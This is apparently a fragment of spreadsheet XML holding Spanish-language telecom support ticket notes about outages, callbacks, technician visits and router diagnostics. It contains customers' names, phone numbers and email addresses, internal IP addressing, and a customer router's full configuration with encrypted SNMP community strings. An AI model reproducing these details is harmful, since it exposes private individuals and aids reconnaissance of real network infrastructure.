    <t>**SE LLAMA A CLEINTE NOE PEREZ AL 22437253 CONTESTA EL SEÑOR SAUL ORELLANA CONFIRMA SERVICIO ESTABLE Y OPERATIVO || AUTORIZA CIERRE DE TICKET **
-ID 1001171725
**</t>
  </si>
  <si>
    <t>SE HABLÓ CON PABLO FERNÁNDEZ/CLIENTE 2243-7253 INDICA QUE ENLACE MEJORÓ DE MODO CONSIDERABLE; PIDE SE MANTENGA EN MONITOREO PARA MAÑANA A LAS 08:00AM</t>
  </si>
  <si>
    <t>F4607052</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A JEFFERSON ARCE/CLIENTE, POSIBLE CORTE DE FO EN SITIO CLIENTE INDICA QUE PR SE RETIRA A LAS 14:00 HORAS, DE SER NECESARIO TRAMITAR INGRESO A TIENDA PIDE SE LE ENVÍE CORREO.</t>
  </si>
  <si>
    <t>SE ENVIO CORREO A CLIENTE
JURGEN RENE BOCH CAAL
BUEN DÍA
ESTIMADO CLIENTE, POR ESTE MEDIO SOLICITO SU APOYO, CON LOS DATOS DE PERSONAL DE LA SUCURSAL PARA REALIZAR DESCARTES DE PRIMER NIVEL EN SUS INSTALACIONES. QUEDAMOS A LA ESPERA DE SUS COMENTARIOS.
SALUDOS.
.</t>
  </si>
  <si>
    <t>F4607076</t>
  </si>
  <si>
    <t>SE ENVIA A VALIDAR VIA CORREO, QUEDAMOS A LA ESPERA DE RESPUESTA.
+
ELVYN ARIEL LOPEZ RECINOS
BUENA NOCHE ESTIMADO CLIENTE;
SE LE INFORMA QUE EL SERVICIO A NIVEL DE LA RED DE CLARO SE ENCUENTRA OPERATIVO Y ESTABLE, SE HA DETECTADO VARIOS REINICIOS EN EL EQUIPO, POSIBLEMENTE FALLA DE ENERGÍA COMERCIAL EN EL SECTOR, SU APOYO DE VALIDAR EL FUNCIONAMIENTO.
SALUDOS
++</t>
  </si>
  <si>
    <t>F4607087</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE VÍCTOR TECÚN 37610279 ENVIA DIRECTO A BUZON
-ID 1001162219 - 1001162914</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE VICTOR TECUN 37610279 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001186164</t>
  </si>
  <si>
    <t>**SE LLAMA A VÍCTOR HUGO TECÚN ALVAREZ AL NUMERO 37610279 NO RESPONDE ENVIA A BUZON**
-ID 1001136898
**</t>
  </si>
  <si>
    <t>F4607096</t>
  </si>
  <si>
    <t>SE TIENE EN LÍNEA A FRANCISCO ORTIZ/CLIENTE INDICA QUE LE CAYÓ AGUA AL EQUIPO Y NO ENCIENDE, LE INDICARON QUE LE LLAMARÍAN EN UNA HORA PARA SEGUIMIENTO, NO LO HAN HECHO; SE PIDE APOYO A GESTIÓN N1 VÍA SKYPE, VÍA TELEFÓNICA APOYA ARIEL LÓPEZ/GESTOR; EN TRIPARTITA ÉSTOS, ESTÁN GESTIONANDO EL CASO, EN ESPERA DE LO QUE DETERMINEN.</t>
  </si>
  <si>
    <t>F4607208</t>
  </si>
  <si>
    <t>***--- SE LLAMO A MARIO CATALAN 3213 6418 (CLIENTE) NO CONTESTA POR LO QUE SE DEBE LLAMAR MAS TARDE ---**
1001020554</t>
  </si>
  <si>
    <t>F4607237</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE EDWIN BARRIENTOS 55525781 PARA PODER REINICIAR LA PBX
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>CLIENTE NOS APOYA CON REINICIAR LA PBX, SE TARDA 5 MIN EN VOLVER A CARGAR, NOS MANTIENE EN LINEA
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>NO SE OBSERVA QUE LEVANTE LA INTERFAZ HACIA LA PBX, CLIENTE EDWIN COMENTA QUE ESTARA VERIFICANDO CON EL PERSONAL EN PUNTO, SOLICITA LLAMADA EN 10 MIN
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SEGUIMIENTO CON PERSONAL TÉCNICO ASIGNADO PARA CERTIFICAR SERVICIO, ADICIONAL SE LLAMÓ A CLIENTE 55525781 PARA BRINDARLE AVANCES DEL TICKET, NO CONTESTA.</t>
  </si>
  <si>
    <t>F4607248</t>
  </si>
  <si>
    <t>ENLACE REINCIDENTE, LLAMARA A CLIENTE PARA VALIDAR SI LOS EQUIPOS SE ENCUENTRAN PROTEGIDOS</t>
  </si>
  <si>
    <t>SE  LLAMA A LA AGENCIA ATIENDE DAYANI GARCIA, QUIEN INDICA QUE GERENTE SE ENCUENTRA OCUPADA POR LO QUE SOLICITA QUE SE LLAME NUEVAMENTE A LAS 14:30
1001223610
COLA:
NOMBRE: A: 23083000
NÚMERO: 011 50223083000
DURACIÓN: 0:04:46
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: +50223083000
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MONICAMARROQUIN
FECHA Y HORA LOCALES: 20/06/2022 13:34:54</t>
  </si>
  <si>
    <t>F4607578</t>
  </si>
  <si>
    <t xml:space="preserve">
SE CONSULTA A PERSONAL DE MONITOREO DE BANCO AZTECA SOBRE EL ESTADO DE LA AGE
NODE STATUS 	UNREACHABLE
SYSTEM NAME 	CC_AZTECA_GT_SUC4467_TECULUTAN
IP ADDRESS 	10.212.156.153
COUNTRY 	GUATEMALA
PROPERTY 	CUSTOMER
GROUP 	CC_AZTECA_VIP
CUSTOMER 	OPMANTEK
LOCATION 	ZACAPA</t>
  </si>
  <si>
    <t>F4607599</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 5174 5290 CONTESTA LA SEÑORITA SANDRA TRANSFIERE  KARINA RUIZ CONFIRMA SERVICIO ESTABLE Y AUTORIZA CIERRE DE TICKET **
-ID 1001109077
**</t>
  </si>
  <si>
    <t>F4607600</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE BILLI FERNANDO AL 78565525 CONTESTA EL SEÑOR MISAEL FLORES Y CONFIRMA LA VISITA PARA MAÑANA A LAS 8:00 AM ESTARA ESPERANDO AL PERSONAL **
ID 1001160666
**</t>
  </si>
  <si>
    <t>SE PLATICA CON EL TEC. FERNANDO LINARES NOS INFORMA QUE SE ENCUENTRA EN LA CENTRAL UBICANDO LA FO YA QUE NO SE ENCUENTRA IDENTIFICADA QUE SE LE DEVUELVA LA LLAMADA DENTRO DE 30 MINUTOS PARA MAS AVANCES.
1001391422
COLA:
NOMBRE: A: 50376469998
NÚMERO: 50376469998
DURACIÓN: 0:00:44
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 50376469998
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.CORADO
FECHA Y HORA LOCALES: 21/06/2022 10:57:57</t>
  </si>
  <si>
    <t>F4607635</t>
  </si>
  <si>
    <t>SE LLAMA A  CL PABLO RIVAS || SE LE INFORMA DE LLEGADA DE TECNICO JUAN ALBERTO TRUJILLO || SE LE INDICA QUE LLEGARÍA EN 1 HORA 30 MIN, INDICA QUE SE LE LLAME AL ESTAR CERCA PARA EL LLEGAR AL LUGAR.
RESULTADO: LLAMADA HECHA
NOMBRE: 44931327
NÚMERO: 011 50244931327
INICIO: HOY, 12:00
FIN: HOY, 12:01
DURACIÓN: 0:57
ID DE LLAMADA: 1001052058</t>
  </si>
  <si>
    <t>F4607653</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOSEP KARTER AL 78500435 INDICA QUE NO HA LLEGADO A OFICINA QUE ESTARA REVISANDO EL CORREO Y SOLICITA QUE SE LE LLAME A LAS 11:00 AM **
-ID  1001110749
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOSEP KARTER AL 78500435 CLIENTE CONFIRMA SERVICIO ESTABLE Y OPERATIVO SOLICITA QUE SE LE REEENVIE NUEVAMENTE EL CORREO YA QUE AYER DESCANSO Y NO QUISO APOYAR EN REVISAR EL CORREO QUE YA SE LE HABIA ENVIADO CONFIRMA QUE EL ESTARA RESPONDIENDO EL CORREO UNA VEZ LO HAY RECIBIDO**
-ID 1001175035
**</t>
  </si>
  <si>
    <t>SE ENVIA COREO A CL--
RE: RE: ID 1025035 TICKET 64951585 SWISSTEX EL SALVADOR</t>
  </si>
  <si>
    <t>F4607707</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GERBER CHAVEZ 31288921 MENCIONA QUE PRESENTARON PERDIDA DE AUDIO A LAS 13:39
SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 1001244338</t>
  </si>
  <si>
    <t>SE LLAMO AL NUMERO DEL GDN Y LA LLAMADA COMPLETA. ATIENDE ELVIS SAZO QUIEN INDICA QUE EL SERVICIO NO HA TENIDO INCONVENIENTES.
1001461412
COLA:
NOMBRE: A: 23203434
NÚMERO: 23203434
DURACIÓN: 0:00:11
ESTADO: CONECTADA
DETALLES: 23203434
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 21/06/2022 14:17:41</t>
  </si>
  <si>
    <t>F4607751</t>
  </si>
  <si>
    <t>LUEGO DE CREAR LA VLAN 3880 EN EL SW 10.103.91.52, EL SERVICIO LEVANTA POR LO QUE  SE CONVERSA CON CLIENTE DANIELA GARCIA, QUIEN CONFIRMA SERVICIO OPERATIVO Y AUTORIZA CIERRE CASO.
1001069017
COLA:
NOMBRE: A: 36019300
NÚMERO: 36019300
DURACIÓN: 0:01:23
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 36019300
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 19/06/2022 14:16:44</t>
  </si>
  <si>
    <t>F4607795</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE PARA VALIDAR EL FUNCIONAMIENTO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: LUNES, 20 DE JUNIO DE 2022 8:37
PARA: CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;; ALEJANDRO NAVARRO FERNANDEZ &lt;ALEJANDRO.NAVARRO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; EMILIO LIQUEZ &lt;EMILIOLIQUEZ@ICASA.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
CC: TELECOMUNICACIONES VPC &lt;TELECOMVPC@ICASA.COM.GT&gt;; CLIENTES VIP HN &lt;CLIENTES.VIP@CLARO.COM.HN&gt;; NIVEL 2 VIP &lt;NIVEL2.VIP@CLARO.COM.HN&gt;
ASUNTO: RE: ENLACE DOWN ID 16680004
*-*-*-*</t>
  </si>
  <si>
    <t>F4607796</t>
  </si>
  <si>
    <t>CLIENTE NO LABORA EL DIA DE HOY, SE VALIDARA EN HORARIO HABIL DE AGENCIA
UNISUPER LO DE FUENTES
CÓDIGO	756
DIRECCIÓN	CALLE PRINCIPAL HACIA LA COLONIA PRIMERO DE MAYO 11-50
TELÉFONO	PBX 23083000 EXT. 075621 , 075611
LUNES A VIERNES	08:30 - 17:00
SÁBADO	09:00 - 13:00</t>
  </si>
  <si>
    <t>F4607842</t>
  </si>
  <si>
    <t>***SE LLAMA A ENCARGADO A LOS NÚMEROS 55105461 / 32516118  CLIENTE NO RESPONDE SE INTENTARA LUEGO.**
ID 1001111521- 1001111765
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PR 32516118 SUENA DESCONECTADO
-ID 1001125297</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MILTON ARMAS 66209720 EXT 113108 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001125777</t>
  </si>
  <si>
    <t>F4607907</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSUE ALEJANDRO 55984656 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001163468</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSUE ALEJANDRO 55984656 MENCIONA QUE PR APERTURA A LAS 10:00 POR LO QUE SOLICITA LLAMADA PARA LAS 10:20
-ID 1001128280</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ENCARGADO AL 57102417 NO RESPONDE ENVIA A BUZON || SE INTENTARA LUEGO**
-ID 1001113631
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PR 57102417 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001127764</t>
  </si>
  <si>
    <t>F4607917</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BERNABE TORRES 40713148 MENCIONA QUE AUN NO HA LLEGADO A PR POR LO QUE SOLICITA LLAMA EN 30 MIN
-ID 1001253259</t>
  </si>
  <si>
    <t>**SE LLAMA A BERNABE TORRES AL  40713148  INDICA QUE AHORITA NO HAY NADIE EN EL SITIO SOLICITA QUE SE LE LLAME A LAS 14:00 HRS NUEVAMENTE **
-ID 1001114344
**</t>
  </si>
  <si>
    <t>F4607953</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE ALEX VILLACINDA QUIEN INDICA QUE NO LES SUENA LA EXTENSION POR ESTE MOTIVO NO CONTESTAN.
SE LE SUGIERE QUE REVISEN LA PBX. CLIENTE ENTERADO.
1001088366,1001088424.
COLA:
NOMBRE: A: 42924684
NÚMERO: 42924684
DURACIÓN: 0:00:11
ESTADO: MARCANDO
DETALLES: 42924684
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 19/06/2022 17:13:52</t>
  </si>
  <si>
    <t>F4607966</t>
  </si>
  <si>
    <t>SE HABLO CON EL CLIENTE KARLA QUIEN SE IDENTIFICA COMO LA RECEPCIONISTA DEL HOTEL.
CLIENTE INDICA QUE EL SERVICIO YA ESTA OPERATIVO PERO SOLICITA QUE SE LE LLAME EN 1HRS.
1001091095
COLA:
NOMBRE: A: 77710475
NÚMERO: 77710475
DURACIÓN: 0:00:17
ESTADO: CONECTADA
DETALLES: 77710475
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 19/06/2022 17:49:55</t>
  </si>
  <si>
    <t>SE HABLO CON EL CLIENTE KARLA QUIEN INDICA QUE NO HA TENIDO INCONVENIENTES CON EL SERVICIO.
SE CONTINUA CON EL MONITOREO.
1001096361
COLA:
NOMBRE: A: 79578300
NÚMERO: 79578300
DURACIÓN: 0:01:15
ESTADO: CONECTADA
DETALLES: 79578300
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 19/06/2022 18:57:18</t>
  </si>
  <si>
    <t>SE LLAMO AL NUMERO DEL GDN Y COMPLETA LA LLAMADA CONTESTA CARLOS CIFUENTES QUIEN AUTORIZA EL CIERRE.
1001101406
COLA:
NOMBRE: A: 79578300
NÚMERO: 79578300
DURACIÓN: 0:00:27
ESTADO: CONECTADA
DETALLES: 79578300
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 19/06/2022 20:56:16</t>
  </si>
  <si>
    <t>SE LLAMO AL NUMERO DEL GDN Y LA LLAMADA COMPLETA.
1001096069
COLA:
NOMBRE: A: 79578300
NÚMERO: 79578300
DURACIÓN: 0:00:05
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 79578300
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 19/06/2022 18:54:15</t>
  </si>
  <si>
    <t>F4608070</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SAUL DIAZ AL 50372742051 || NO RESPONDE || ENVIA A BUZON ||SE INTENTARA LUEGO **
-ID 1001144989
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SAUL DIAZ 72742051 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 1001189680</t>
  </si>
  <si>
    <t>F4608090</t>
  </si>
  <si>
    <t xml:space="preserve">ESTIMADOS COORDINAR VISITA PARA REVICION DE POSBLE CORTE DE FIBRA OPTICA HACIA EL CLIENTE COORDINAR VISITA PARA EL DIA DE MAÑANA HORARIO DE ATENCION DE 7;30 A 10 PM ENVIAR CORREO PARA SOLICITAR PERMISOS EN EL CLIENTE.
FALLA: 		F4608090
NOMBRE DEL CLIENTE: 	CARDEDEU SA DE CV	
UBICACIÓN: 		EL CONGO, LAGO DE COATEPEQUER CALLE LA BENDICION RESTAURANTE PAMPA COATEPEQUE  		
CONTACTO EN SITIO:	YESENIA AGUILAR 76035206 	
HORARIO DE ATENCION:	7:30 AM A 10:00 PM	
GESTIÓN DE PERMISOS: 	HOTELCARDEDEU@GMAIL.COM
ÚLTIMA MILLA:	 ETX1 10.146.53.19 -- FO ETX1 10.146.53.20 --&gt; ROUTER CISCO 10.189.67.197 CLIENTE
EQUIPO DE ACCESO (SW): PE EL PALMAR EPA-CSCASR9006-M1	BCOA2-CSC003400-ME1 F0/9
TIPO DE ENLACE:	FO / INTERNET 	
PROBLEMA QUE REPORTA: 	CAIDA TOTAL (SE REALIZARON PRUEBAS REINICIOS FISICOS DE ETEX EN EL CLEINTE PERO NO S3E TUVO LINK DE FIBRA OPTICA ES NECESARIO REALIZAR MEDICIONES 	
ACCIONES A TOMAR:	FAVOR ENVIAR PERSONAL A REVISAR FIBRA OPTICA POSIBLE CORTE DE HILO DE FIBRA OPTICA. 	
		</t>
  </si>
  <si>
    <t>##SE MANADA CORREO PARA GESTIONAR PERMISOS ##
DE: VELDIN JANITZIO PALENCIA FLORES
ENVIADO: LUNES, 20 DE JUNIO DE 2022 11:09
PARA: HOTELCARDEDEU@GMAIL.COM &lt;HOTELCARDEDEU@GMAIL.COM&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: GESTION DE PERMISOS | ID1405008SV |CARDEDEU SA DE CV | EL CONGO LAGO DE COATEPEQUE CALLE LA BENDICION S/N PROYECTO SANTA MONICA
BUENAS TARDES ESTIMADOS,
EN SEGUIMIENTO AL SERVICIO ID1405008SV |CARDEDEU SA DE CV   | EL CONGO               LAGO DE COATEPEQUE     CALLE LA BENDICION     S/N                    PROYECTO SANTA MONICA
SOLICITAMOS DE SU APOYO GESTIONANDO ACCESOS PARA EL PERSONAL TÉCNICO INDICANDO LA HORA Y DÍA DE VISITA.
TECNICOS:
00157708-4	4690	ABRAHAM SAMUEL PEREZ
QUEDAMOS ATENTOS A SUS COMENTARIOS
SALUDOS CORDIALES</t>
  </si>
  <si>
    <t>###SE REVISA COLA DE CORREOS SIN RESPUESTA AUN POR PARTE DEL CLIENTE###
ASUNTO GESTION DE PERMISOS | ID1405008SV |CARDEDEU SA DE CV | EL CONGO LAGO DE COATEPEQUE CALLE LA BENDICION S/N PROYECTO SANTA MONICA</t>
  </si>
  <si>
    <t>F4608118</t>
  </si>
  <si>
    <t xml:space="preserve">ENLACE OPERATIVO A NIVEL WAN SE PORCEDE CON CIERRE POR ENERGIA COMERCIAL
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO.
NO SE TIENE GESTION DEL CPE
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN INTERNET_GT_METRO 10.174.235.39
  PING 10.174.235.39: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.174.235.39 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/27 MS
RUTA IP:
PE: 10.179.28.14
DISPLAY IP ROUTING-TABLE VPN-INSTANCE INTERNET_GT_METRO 10.174.235.39
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : INTERNET_GT_METRO
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
  10.174.235.39/32  DIRECT  0    0                 0.0.0.0         VLANIF3740			</t>
  </si>
  <si>
    <t>F4608122</t>
  </si>
  <si>
    <t xml:space="preserve">SE TIENE ALAMRA DE ENERGIA EN EL EQUIPO CPE SE PORCEDE CON CIERRE POR ENERGIA
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO.
SE OBSERVA UNA ALARMA DE ENERGIA RECIENTE (HACE: 0 HORAS Y 9 MINUTOS)
HUAWEI VERSATILE ROUTING PLATFORM SOFTWARE
VRP (R) SOFTWARE, VERSION 5.160 (AR160 V200R008C20SPC800)
COPYRIGHT (C) 2011-2016 HUAWEI TECH CO., LTD
HUAWEI AR129CGVW-L ROUTER UPTIME IS 0 WEEK, 0 DAY, 0 HOUR, 9 MINUTES
MPU 0(MASTER) : UPTIME IS 0 WEEK, 0 DAY, 0 HOUR, 9 MINUTES
SDRAM MEMORY SIZE    : 512     M BYTES
FLASH 0 MEMORY SIZE  : 512     M BYTES
MPU VERSION INFORMATION :
1. PCB      VERSION  : AR129CGVW-L VER.C
2. MAB      VERSION  : 0
3. BOARD    TYPE     : AR129CGVW-L
4. BOOTROM  VERSION  : 1
&lt;CC_WALMART_CR_TIENDA_3107&gt;
CONFIGURACION DEL CPE:
DISPLAY  CURRENT-CONFIGURATION
[V200R008C20SPC800]
#
 SYSNAME CC_WALMART_CR_TIENDA_3107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0.172 0.0.0.3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GQ;=]D%WV*JD=7'LX,S.I67O,+R00YN,$/$[AUN*NND5"UX&lt;DOZ`NK&gt;F5$%^%#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
INTERFACE ETHERNET0/0/0
#
INTERFACE GIGABITETHERNET0/0/0
 UNDO PORTSWITCH
 DESCRIPTION WAN PRINCIPAL/_/CONTR0001541963OC/_/
 SET FLOW-STAT INTERVAL 30
#
INTERFACE GIGABITETHERNET0/0/0.1107
 DESCRIPTION PRIMARY LINK TO MTR105
 DOT1Q TERMINATION VID 1107
 IP ADDRESS 10.201.11.185 255.255.255.192
#
INTERFACE GIGABITETHERNET0/0/0.2107
 DESCRIPTION REDUNDANCY LINK TO MTR488
 DOT1Q TERMINATION VID 2107
 IP ADDRESS 10.201.41.185 255.255.255.192
#
INTERFACE GIGABITETHERNET0/0/1
 UNDO PORTSWITCH
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 22.32.0.173 255.255.255.252
 OSPF NETWORK-TYPE P2P
 OSPF TIMER DEAD 60
#
INTERFACE GIGABITETHERNET0/0/2
 DESCRIPTION LIBRE
 SHUTDOWN
#
INTERFACE GIGABITETHERNET0/0/3
 DESCRIPTION LIBRE
 SHUTDOWN
#
INTERFACE GIGABITETHERNET0/0/4
 DESCRIPTION LIBRE
 SHUTDOWN
#
INTERFACE GIGABITETHERNET0/0/5
 DESCRIPTION LAN DEL CLIENTE
#
INTERFACE CELLULAR0/0/0
#
INTERFACE CELLULAR0/0/1
#
INTERFACE NULL0
#
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.99.77.109 255.255.255.255
#
BGP 64528
 ROUTER-ID 10.99.77.109
 PEER 10.201.11.129 AS-NUMBER 14754
 PEER 10.201.41.129 AS-NUMBER 14754
 #
 IPV4-FAMILY UNICAST
  UNDO SYNCHRONIZATION
  NETWORK 10.99.77.109 255.255.255.255
  IMPORT-ROUTE OSPF 65410
  PEER 10.201.11.129 ENABLE
  PEER 10.201.11.129 ROUTE-POLICY LOCAL_PREFERENCE IMPORT
  PEER 10.201.11.129 ROUTE-POLICY LOCAL_PREFERENCE EXPORT
  PEER 10.201.11.129 NEXT-HOP-LOCAL
  PEER 10.201.41.129 ENABLE
  PEER 10.201.41.129 NEXT-HOP-LOCAL
#
OSPF 65410
 DEFAULT-ROUTE-ADVERTISE
 IMPORT-ROUTE DIRECT
 IMPORT-ROUTE OSPF 450
 AREA 0.0.0.0
  NETWORK 22.32.0.172 0.0.0.3
#
ROUTE-POLICY OSPF_DATOS_WALMART PERMIT NODE 10
 IF-MATCH ACL 2999
#
ROUTE-POLICY LOCAL_PREFERENCE PERMIT NODE 10
 APPLY LOCAL-PREFERENCE 200
#
 SNMP-AGENT LOCAL-ENGINEID 800007DB0360DEF3292B35
 SNMP-AGENT COMMUNITY READ %^%#2FVF(,ZNM;C|'J)J+2&amp;3EK-+TVW*J!)O.P&lt;MEAC'A@Z72[CWB5W|-Z5RZ'1"ZJY'MZB)V~^W:W&gt;)HY{-%^%# ACL 2988
 SNMP-AGENT COMMUNITY READ %^%#AHORH&gt;DD2YWE@{S5GZ_E;^|V@1DWH48H*GK)1^I&gt;:BD"JCCL&lt;"0HB3PM,.~6NNRTM,FIMWP-IZV`JQPI%^%#
 SNMP-AGENT SYS-INFO LOCATION COSTADO ESTE DE LA MUNICIPALIDAD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
INTERFACE WLAN-RADIO0/0/1
#
DOT1X-ACCESS-PROFILE NAME DOT1X_ACCESS_PROFILE
#
MAC-ACCESS-PROFILE NAME MAC_ACCESS_PROFILE
#
 NTP-SERVICE UNICAST-PEER 10.201.41.129
 NTP-SERVICE UNICAST-SERVER 10.201.11.129
#
VOICE
 #
 DIAGNOSE
#
OPS
#
AUTOSTART
#
RETURN
&lt;CC_WALMART_CR_TIENDA_3107&gt;
LOG DEL ROUTER CPE:
DISPLAY LOGBUFFER
LOGGING BUFFER CONFIGURATION AND CONTENTS: ENABLED
ALLOWED MAX BUFFER SIZE: 1024
ACTUAL BUFFER SIZE: 512
CHANNEL NUMBER: 4, CHANNEL NAME: LOGBUFFER
DROPPED MESSAGES: 0
OVERWRITTEN MESSAGES: 0
CURRENT MESSAGES: 27
JUN 19 2022 21:52:41-06:00 CC_WALMART_CR_TIENDA_3107 %%01OSPF/4/NBR_CHANGE_E(L)[0]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=65410, NEIGHBORADDRESS=22.32.0.174, NEIGHBOREVENT=LOADINGDONE, NEIGHBORPREVIOUSSTATE=LOADING, NEIGHBORCURRENTSTATE=FULL)
JUN 19 2022 21:52:41-06:00 CC_WALMART_CR_TIENDA_3107 %%01OSPF/4/NBR_CHANGE_E(L)[1]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=65410, NEIGHBORADDRESS=22.32.0.174, NEIGHBOREVENT=EXCHANGEDONE, NEIGHBORPREVIOUSSTATE=EXCHANGE, NEIGHBORCURRENTSTATE=LOADING)
JUN 19 2022 21:52:41-06:00 CC_WALMART_CR_TIENDA_3107 %%01OSPF/4/NBR_CHANGE_E(L)[2]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=65410, NEIGHBORADDRESS=22.32.0.174, NEIGHBOREVENT=NEGOTIATIONDONE, NEIGHBORPREVIOUSSTATE=EXSTART, NEIGHBORCURRENTSTATE=EXCHANGE)
JUN 19 2022 21:52:39-06:00 CC_WALMART_CR_TIENDA_3107 %%01OSPF/4/NBR_CHANGE_E(L)[3]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=65410, NEIGHBORADDRESS=22.32.0.174, NEIGHBOREVENT=2WAYRECEIVED, NEIGHBORPREVIOUSSTATE=INIT, NEIGHBORCURRENTSTATE=EXSTART)
JUN 19 2022 21:52:30-06:00 CC_WALMART_CR_TIENDA_3107 %%01OSPF/4/NBR_CHANGE_E(L)[4]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=65410, NEIGHBORADDRESS=22.32.0.174, NEIGHBOREVENT=HELLORECEIVED, NEIGHBORPREVIOUSSTATE=DOWN, NEIGHBORCURRENTSTATE=INIT)
JUN 19 2022 21:52:26-06:00 CC_WALMART_CR_TIENDA_3107 %%01IFNET/4/LINK_STATE(L)[5]:THE LINE PROTOCOL IP ON THE INTERFACE GIGABITETHERNET0/0/1 HAS ENTERED THE UP STATE.
JUN 19 2022 21:52:26-06:00 CC_WALMART_CR_TIENDA_3107 %%01IFPDT/4/IF_STATE(L)[6]:INTERFACE GIGABITETHERNET0/0/1 HAS TURNED INTO UP STATE.
JUN 19 2022 21:51:18-06:00 CC_WALMART_CR_TIENDA_3107 %%01NTP/4/PEER_SELE(L)[7]:THE PEER SELECTED BY THE SYSTEM IS 10.201.11.129.
JUN 19 2022 21:51:18-06:00 CC_WALMART_CR_TIENDA_3107 %%01NTP/4/STRATUM_CHANGE(L)[8]:SYSTEM STRATUM CHANGES FROM 16 TO 4 AFTER CLOCK UPDATE.
JUN 19 2022 21:51:18-06:00 CC_WALMART_CR_TIENDA_3107 %%01NTP/4/LEAP_CHANGE(L)[9]:SYSTEM LEAP CHANGES FROM 3 TO 0 AFTER CLOCK UPDATE.
JUN 19 2022 20:21:12-06:00 CC_WALMART_CR_TIENDA_3107 %%01NTP/4/PEER_SELE(L)[10]:THE PEER SELECTED BY THE SYSTEM IS 10.201.11.129.
